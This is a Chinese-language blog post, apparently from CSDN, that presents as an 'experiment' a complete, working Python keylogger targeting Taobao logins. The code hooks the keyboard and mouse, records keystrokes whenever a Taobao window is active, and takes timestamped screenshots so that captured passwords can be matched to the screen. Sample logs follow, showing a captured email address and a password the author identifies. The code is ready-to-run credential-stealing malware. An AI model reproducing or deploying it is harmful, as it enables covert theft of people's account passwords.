Python:通过获取淘宝账号和密码的实验，来看登陆方式选择

在上一篇文章《Python:通过获取淘宝账号和密码的实验，来看登陆方式选择的重要性》中，通过日志记录了一些可能是用户输入的用户名或密码等信息，但如果用户在网站上输入的是其他信息，我们从中区分出敏感信息还是要花费时间来分析的，刚才想了想，将功能优化了一下。

一、思路：

1、在抓取到用户输入的信息后，除了记录到日志中外，再给当前屏幕截一张图，以日期命名；

2、通过对于图片名与日志中ERROR级别对应的时间点，就可以判断内容是不是敏感信息；

3、之所以采用抓图和日志结合的方法，是因为密码在界面上不会显示出来，图片中看不到，必须结合日志，呵呵。

二、实现：

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import pythoncom
import pyHook
import time
import logging
import logging.config
from PIL import ImageGrab

#日志配置文件名
LOG_FILENAME = "hook_logging.conf"

#日志语句提示信息
LOG_CONTENT_NAME = "taobao_input_msg"

def log_init(log_config_filename, logname):
    """
    Function:日志模块初始化函数
    Input：log_config_filename:日志配置文件名
           lognmae:每条日志前的提示语句
    Output: logger
    author: socrates
    blog:http://blog.csdn.net/dyx1024
    date:2012-02-13
    """
    logging.config.fileConfig(log_config_filename)
    logger = logging.getLogger(logname)
    return logger

    
def onMouseEvent(event):
    """
    Function:处理鼠标左键单击事件，如果当前MSG中存放了信息，
                                 将其写入文件，因为有的用户在输入 完用户名后，不是使用TAB键切换到密码
                                 框,而是通过鼠标切换到密码输入窗口这种情况应该属于大多数网民的习惯，
                                 所以此处要判断是否通过鼠标切换了输入窗口
    Input：even
    Output: Ture
    author: socrates
    blog:http://blog.csdn.net/dyx1024
    date:2012-03-03
    """
    global MSG
    if len(MSG) != 0:
        hook_logger.info("current page:%s" % event.WindowName)
        hook_logger.error("information:%s" % MSG)
        MSG = "" 
        #屏幕抓图实现
        pic_name = time.strftime("%Y%m%d%H%M%S",time.localtime(time.time()))
        pic = ImageGrab.grab()
        pic.save("%s.png" % pic_name)
        #保存成为以日期命名的图片
    return True
        

def onKeyboardEvent(event): 
    "处理键盘事件"  
    """
    Function:处理键盘事件，如果当前窗口为TAOBAO页面，刚开始监控并记录用户输入
                                   因为此时用户可能准备输入用户名及密码进行登陆，所以将用户输入的所有可见
                                 的ascii字符记录下来，此处要考虑用户是否使用了TAB键或回车键来
                                结束输入，此时要将信息记录到日志中。
    Input：even
    Output: Ture
    author: socrates
    blog:http://blog.csdn.net/dyx1024
    date:2012-03-03
    """     
    global MSG
    if event.WindowName.decode("GBK").find(u"淘宝") != -1:
        if (127 >= event.Ascii > 31) or (event.Ascii == 8):
            MSG += chr(event.Ascii)
            hook_logger.info("ascii:%d(%s)" % (event.Ascii, str(event.Key)))        
        if (event.Ascii == 9) or (event.Ascii == 13):
            hook_logger.info("current page:%s" % event.WindowName)
            hook_logger.error("information:%s" % MSG)
            MSG = "" 
            #屏幕抓图实现
            pic_name = time.strftime("%Y%m%d%H%M%S",time.localtime(time.time()))
            pic = ImageGrab.grab()
            #保存成为以日期命名的图片
            pic.save("%s.png" % pic_name)
            
    return True

if __name__ == "__main__": 
    """
    Function:获取TAOBAO账号及密码，增加抓图功能
    Input：NONE
    Output: NONE
    author: socrates
    blog:http://blog.csdn.net/dyx1024
    date:2012-03-03
    """  
 
    #打开日志文件
    #初始化日志系统
    hook_logger = log_init(LOG_FILENAME, LOG_CONTENT_NAME) 
    
    MSG = ""       

    #创建hook句柄
    hm = pyHook.HookManager()

    #监控鼠标
    hm.SubscribeMouseLeftDown(onMouseEvent)
    hm.HookMouse()
    
    #监控键盘
    hm.KeyDown = onKeyboardEvent
    hm.HookKeyboard()

    #循环获取消息
    pythoncom.PumpMessages()
    

三、测试：

1、记录下来的日志内容：

[2012-03-03 13:03:52,530  taobao_input_msg]INFO:  ascii:105(I)
[2012-03-03 13:03:53,342  taobao_input_msg]INFO:  ascii:112(P)
[2012-03-03 13:03:53,640  taobao_input_msg]INFO:  ascii:104(H)
[2012-03-03 13:03:54,608  taobao_input_msg]INFO:  ascii:111(O)
[2012-03-03 13:04:01,655  taobao_input_msg]INFO:  ascii:110(N)
[2012-03-03 13:04:01,921  taobao_input_msg]INFO:  ascii:101(E)
[2012-03-03 13:04:03,937  taobao_input_msg]INFO:  ascii:52(4)
[2012-03-03 13:04:04,358  taobao_input_msg]INFO:  ascii:115(S)
[2012-03-03 13:04:08,640  taobao_input_msg]INFO:  current page:淘宝网 - 淘！我喜欢 - Google Chrome
[2012-03-03 13:04:08,640  taobao_input_msg]ERROR:  information:iphone4s
[2012-03-03 13:04:27,187  taobao_input_msg]INFO:  ascii:115(S)
[2012-03-03 13:04:27,655  taobao_input_msg]INFO:  ascii:111(O)
[2012-03-03 13:04:28,217  taobao_input_msg]INFO:  ascii:99(C)
[2012-03-03 13:04:28,921  taobao_input_msg]INFO:  ascii:114(R)
[2012-03-03 13:04:29,155  taobao_input_msg]INFO:  ascii:97(A)
[2012-03-03 13:04:29,733  taobao_input_msg]INFO:  ascii:116(T)
[2012-03-03 13:04:29,983  taobao_input_msg]INFO:  ascii:101(E)
[2012-03-03 13:04:30,280  taobao_input_msg]INFO:  ascii:115(S)
[2012-03-03 13:04:31,828  taobao_input_msg]INFO:  ascii:64(2)
[2012-03-03 13:04:33,515  taobao_input_msg]INFO:  ascii:103(G)
[2012-03-03 13:04:34,187  taobao_input_msg]INFO:  ascii:109(M)
[2012-03-03 13:04:34,265  taobao_input_msg]INFO:  ascii:97(A)
[2012-03-03 13:04:34,421  taobao_input_msg]INFO:  ascii:105(I)
[2012-03-03 13:04:34,592  taobao_input_msg]INFO:  ascii:108(L)
[2012-03-03 13:04:35,030  taobao_input_msg]INFO:  ascii:46(Oem_Period)
[2012-03-03 13:04:35,217  taobao_input_msg]INFO:  ascii:99(C)
[2012-03-03 13:04:35,342  taobao_input_msg]INFO:  ascii:111(O)
[2012-03-03 13:04:35,515  taobao_input_msg]INFO:  ascii:109(M)
[2012-03-03 13:04:37,812  taobao_input_msg]INFO:  current page:None
[2012-03-03 13:04:37,812  taobao_input_msg]ERROR:  information:socrates@gmail.com
[2012-03-03 13:04:43,905  taobao_input_msg]INFO:  ascii:57(9)
[2012-03-03 13:04:44,171  taobao_input_msg]INFO:  ascii:56(8)
[2012-03-03 13:04:44,467  taobao_input_msg]INFO:  ascii:55(7)
[2012-03-03 13:04:44,780  taobao_input_msg]INFO:  ascii:54(6)
[2012-03-03 13:04:45,108  taobao_input_msg]INFO:  ascii:53(5)
[2012-03-03 13:04:45,437  taobao_input_msg]INFO:  ascii:52(4)
[2012-03-03 13:04:45,796  taobao_input_msg]INFO:  ascii:51(3)
[2012-03-03 13:04:46,437  taobao_input_msg]INFO:  ascii:50(2)
[2012-03-03 13:04:47,046  taobao_input_msg]INFO:  ascii:49(1)
[2012-03-03 13:04:52,375  taobao_input_msg]INFO:  ascii:113(Q)
[2012-03-03 13:04:52,765  taobao_input_msg]INFO:  ascii:119(W)
[2012-03-03 13:04:53,030  taobao_input_msg]INFO:  ascii:101(E)
[2012-03-03 13:04:53,328  taobao_input_msg]INFO:  ascii:114(R)
[2012-03-03 13:04:53,687  taobao_input_msg]INFO:  ascii:116(T)
[2012-03-03 13:04:56,640  taobao_input_msg]INFO:  current page:None
[2012-03-03 13:04:56,640  taobao_input_msg]ERROR:  information:987654321qwert
[2012-03-03 13:04:57,703  taobao_input_msg]INFO:  ascii:106(J)
[2012-03-03 13:04:58,155  taobao_input_msg]INFO:  ascii:116(T)
[2012-03-03 13:04:59,125  taobao_input_msg]INFO:  ascii:54(6)
[2012-03-03 13:05:00,328  taobao_input_msg]INFO:  ascii:121(Y)
[2012-03-03 13:05:02,578  taobao_input_msg]INFO:  current page:None
[2012-03-03 13:05:02,578  taobao_input_msg]ERROR:  information:jt6y

2、过滤出ERROR级别日志信息，如下：

[2012-03-03 13:04:08,640  taobao_input_msg]ERROR:  information:iphone4s
[2012-03-03 13:04:37,812  taobao_input_msg]ERROR:  information:socrates@gmail.com
[2012-03-03 13:04:56,640  taobao_input_msg]ERROR:  information:987654321qwert
[2012-03-03 13:05:02,578  taobao_input_msg]ERROR:  information:jt6y

3、查看生成的图片：

可以看出，图片名称中的时间和日志中的时间一一对应，这样就可查看每条日志打印时当前屏幕的状态。

具体看一下每条日志对应的图片：

a. [2012-03-03 13:04:08,640  taobao_input_msg]ERROR:  information:iphone4s

b. [2012-03-03 13:04:37,812  taobao_input_msg]ERROR:  information:socrates@gmail.com

c. [2012-03-03 13:04:56,640  taobao_input_msg]ERROR:  information:987654321qwert  （原来这行才是密码）

d [2012-03-03 13:05:02,578  taobao_input_msg]ERROR:  information:jt6y